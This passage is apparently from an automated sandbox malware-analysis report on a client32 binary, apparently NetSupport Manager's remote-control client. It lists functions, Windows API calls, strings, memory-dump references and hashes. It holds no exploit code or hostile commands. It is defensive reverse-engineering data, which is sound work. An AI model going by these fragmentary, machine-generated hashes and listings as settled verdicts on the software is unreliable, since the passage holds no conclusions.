                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Window$Find$MessageSendSleep
                                                                                • String ID: DoMMData - could not find %s window$PCIVideoSlave32
                                                                                • API String ID: 1010850397-3146847729
                                                                                • Opcode ID: aae4a453ef0a99841fb0c8f2bdb4662e73cf68ed11950b93a08a3e71c3a39851
                                                                                • Instruction ID: 9c7747beff98129d0e206a6ba61550f1bc8c1a2fc0044bc1d9efbb7d24d88507
                                                                                • Opcode Fuzzy Hash: aae4a453ef0a99841fb0c8f2bdb4662e73cf68ed11950b93a08a3e71c3a39851
                                                                                • Instruction Fuzzy Hash: BBF02735E8121C77D710AA98AC0ABEEBB689B0170EF004098ED1966280EBB5251087DB
                                                                                Function 11081680 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _free.LIBCMT ref: 110816D7
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorExitLastMessageProcess_freewsprintf
                                                                                • String ID: ..\CTL32\DataStream.cpp$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                                • API String ID: 2441568934-1875806619
                                                                                • Opcode ID: 447824e72cda998df234909720421efff22f71a3ff5c8715bed7def871f972f3
                                                                                • Instruction ID: 681d8586094b0eb4f99e23d602ddbaf233b7ff3414f9fb7bc0106feac7c5022a
                                                                                • Opcode Fuzzy Hash: 447824e72cda998df234909720421efff22f71a3ff5c8715bed7def871f972f3
                                                                                • Instruction Fuzzy Hash: E8F027B8F083221FEA30DE54BC02BC9F7D01F0824CF080494E9C327240E7B26818C6E2
                                                                                Function 110EFB20 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetDeviceCaps.GDI32(?,0000000E), ref: 110EFB32
                                                                                • GetDeviceCaps.GDI32(?,0000000C), ref: 110EFB39
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CapsDevice$ErrorExitLastMessageProcesswsprintf
                                                                                • String ID: ..\CTL32\pcibmp.cpp$nColors
                                                                                • API String ID: 2713834284-4292231205
                                                                                • Opcode ID: c8878a077f428f9bb25e6d41f0c44af9662807efe6cd3c41329cf584f49568f3
                                                                                • Instruction ID: cfed96a02f924fb25650393b30a092bd0643f011e0ddcc2ee79cac053fdacdf4
                                                                                • Opcode Fuzzy Hash: c8878a077f428f9bb25e6d41f0c44af9662807efe6cd3c41329cf584f49568f3
                                                                                • Instruction Fuzzy Hash: 4AE04F23F4123937EA11659AAC46FCAF79C9B867A8F0201B2FA04FB392E5D16C0446D5
                                                                                Function 1103D1F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 11110920: EnterCriticalSection.KERNEL32(00000010,00000000,757323A0,1100BF7B), ref: 11110928
                                                                                  • Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010), ref: 11110935
                                                                                • _free.LIBCMT ref: 1103D221
                                                                                  • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                  • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                  • Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010,?), ref: 11110970
                                                                                • SetPriorityClass.KERNEL32(?,?), ref: 1103D24C
                                                                                • MessageBeep.USER32(00000000), ref: 1103D25E
                                                                                Strings
                                                                                • Show has overrun too much, aborting, xrefs: 1103D1F1
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$Leave$BeepClassEnterErrorFreeHeapLastMessagePriority_free
                                                                                • String ID: Show has overrun too much, aborting
                                                                                • API String ID: 304545663-4092325870
                                                                                • Opcode ID: 38cbc4052beda61ee506a84b884a1a9d6557445bc312e3507d1d7bbe4ecf2d69
                                                                                • Instruction ID: 9026de0c3b0683949d6f7ac94f5710338a9a532b2cd303e3c01edb637dee248d
                                                                                • Opcode Fuzzy Hash: 38cbc4052beda61ee506a84b884a1a9d6557445bc312e3507d1d7bbe4ecf2d69
                                                                                • Instruction Fuzzy Hash: 50F0B4B4B016139BFB59CBB08914BD9F69DBF8071DF000118E92C97280EB70B224C7D2
                                                                                Function 11135840 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                • CreateThread.KERNEL32(00000000,00001000,11135700,00000000,00000000,1114239E), ref: 11135874
                                                                                • CloseHandle.KERNEL32(00000000,?,?,1114239E,?,?,?,00000000,?), ref: 1113587B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCreateHandleThread__wcstoi64
                                                                                • String ID: UnresponsiveTime$_debug
                                                                                • API String ID: 3257255551-835906747
                                                                                • Opcode ID: cc8639b16c25cac1e52894210ac58e7b2359e4dff3c35d598e5f7e41013e41f7
                                                                                • Instruction ID: da03a37385785a02b027e482226a98526a2e13ea63ea6826a5b8101025715082
                                                                                • Opcode Fuzzy Hash: cc8639b16c25cac1e52894210ac58e7b2359e4dff3c35d598e5f7e41013e41f7
                                                                                • Instruction Fuzzy Hash: B2E0C239784318BBF66887E29E4AFB5FB1CE704B56F500158FB19A64C8DA917800C76A
                                                                                Function 1101D3C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,?), ref: 1101D3EB
                                                                                • EnableWindow.USER32(00000000,?), ref: 1101D3F6
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EnableErrorExitItemLastMessageProcessWindowwsprintf
                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                • API String ID: 1136984157-1986719024
                                                                                • Opcode ID: bd8169d8b1d2f1da16aa56a8743fe70e232c658d653b50b5f908e1dbd2e13666
                                                                                • Instruction ID: 36c1a6ee6805b1b90e48090b7f41ce0c53d42d7852bf61e64861d4a713bbcb04
                                                                                • Opcode Fuzzy Hash: bd8169d8b1d2f1da16aa56a8743fe70e232c658d653b50b5f908e1dbd2e13666
                                                                                • Instruction Fuzzy Hash: E3E0867950022DBFC7149E91DC85EAAF35CEB44269F00C135F96656644D674E84087A4
                                                                                Function 11027530 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23sleepthreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EnumExitSleepThreadWindows
                                                                                • String ID: TapiFix
                                                                                • API String ID: 1804117399-2824097521
                                                                                • Opcode ID: 9b936a382379f1639e294998df4fda084f6c97918e753868017fe61e0b06262c
                                                                                • Instruction ID: 0d22cb111dc1a1c74f2ece42ee292e751dc76676b098746739fa73436add6467
                                                                                • Opcode Fuzzy Hash: 9b936a382379f1639e294998df4fda084f6c97918e753868017fe61e0b06262c
                                                                                • Instruction Fuzzy Hash: C7E04838A4167CAFE615DB918D84F56BA989B5535CF810030E4351664597B07940C7A9
                                                                                Function 1101D410 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,?), ref: 1101D43F
                                                                                • ShowWindow.USER32(00000000), ref: 1101D446
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorExitItemLastMessageProcessShowWindowwsprintf
                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                • API String ID: 1319256379-1986719024
                                                                                • Opcode ID: 8377f77b347f7a331b9e274c23780b90952fd8225b6a3357c05bbe4f1f66010c
                                                                                • Instruction ID: e0f7042720cd81023d22bad3d6b473d4ff1ed87f82d399384176be7cf1b5ebc2
                                                                                • Opcode Fuzzy Hash: 8377f77b347f7a331b9e274c23780b90952fd8225b6a3357c05bbe4f1f66010c
                                                                                • Instruction Fuzzy Hash: D3E04F7594032DBBC7049A95DC89EEAB39CEB54229F008025F92556600E670A84087A0
                                                                                Function 1100BB30 Relevance: 6.2, APIs: 4, Instructions: 177COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                • std::exception::exception.LIBCMT ref: 1100BBF0
                                                                                • __CxxThrowException@8.LIBCMT ref: 1100BC05
                                                                                • std::exception::exception.LIBCMT ref: 1100BC14
                                                                                • __CxxThrowException@8.LIBCMT ref: 1100BC29
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Exception@8Throwstd::exception::exception$_malloc_memsetwsprintf
                                                                                • String ID:
                                                                                • API String ID: 1651403513-0
                                                                                • Opcode ID: d105c775ddae6e4726b07b80f939296b7c9628154e9c4022b4af25f4ab2e10ff
                                                                                • Instruction ID: 24df0323ce75f1771b5e486737171493ff854af14d8bb6c891eae8217b7a1c7e
                                                                                • Opcode Fuzzy Hash: d105c775ddae6e4726b07b80f939296b7c9628154e9c4022b4af25f4ab2e10ff
                                                                                • Instruction Fuzzy Hash: 28711BB9A05B09DFD715CF68C980A9AFBF4FB48714F10866EE86A97740D730A904CB91
                                                                                Function 11165643 Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                • String ID:
                                                                                • API String ID: 2782032738-0
                                                                                • Opcode ID: 415f7824d5181701451102ec2043120fcf40d14aa730d168d4873098ed8d68d1
                                                                                • Instruction ID: 2bbfea60a2a12786820c2de27e6caf434d82015e81e2d2deebce7f4ca3d92771
                                                                                • Opcode Fuzzy Hash: 415f7824d5181701451102ec2043120fcf40d14aa730d168d4873098ed8d68d1
                                                                                • Instruction Fuzzy Hash: 7541F635A00B05DFDB558F65D94059EFBBEEF803A4F254128D45597240E7F6ED60CB40
                                                                                Function 11067900 Relevance: 6.1, APIs: 4, Instructions: 116windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MessageBeep.USER32(00000000), ref: 1106791B
                                                                                • MessageBeep.USER32(00000000), ref: 11067957
                                                                                • MessageBeep.USER32(00000000), ref: 110679AA
                                                                                • MessageBeep.USER32(00000000), ref: 110679EB
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
